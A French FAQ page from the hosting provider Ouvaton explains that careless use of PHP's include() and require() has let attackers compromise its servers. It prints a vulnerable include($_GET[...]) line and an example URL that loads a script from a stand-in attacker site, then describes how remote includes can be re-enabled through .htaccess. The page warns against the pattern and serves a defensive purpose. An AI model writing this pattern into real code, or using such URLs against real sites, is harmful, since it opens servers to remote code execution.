Accueil > Boîtes à outils > FAQ > Les fonctions include() et require()

Les fonctions include() et require()

Plusieurs fois, les serveurs d’Ouvaton ont été piratés à cause d’une utilisation maladroite de ces fonctions.

Vous trouverez dans un premier temps, la synthaxe de ces fonctions sur le site nexen.net

Quelques règles à respecter :

  1. pas d’insertion sur des variables passées en arguments, ou alors avec précautions. RDV sur les forums où des utilisateurs pourront éventuellement vous conseiller.
  2. les fichiers insérés sont en *.php
  3. si possible, veillez à insérer des fichiers qui sont sur le même domaine

De manière générale le code suivant :

include($_GET['mon_fichier.php');

est à proscrire !

Avec ce type de codes, l’url suivante :

http://www.mondomaine.net/script_non_secure.php?fichier=http://siteattaquant.net/scriptphp.txt

peut exécuter n’importe quels scripts sur nos serveurs.

Pour cette raison, à partir d’août 2005, les serveurs d’Ouvaton n’acceptent plus par défaut les include() distants via http (ouverture d’url via include).

Si ces fonctions [1] vous intéressent, il faudra alors placer un fichier .htaccess à la racine de votre site contenant le code suivant [2] :

php_value allow_url_fopen On

Veillez alors à régler la sécurité de votre script, si besoin en prenant des avis sur le forum php-mysql.


[1cela concerne également la fonction fopen

[2vérifier si c’est encore valable pour Ouvaton3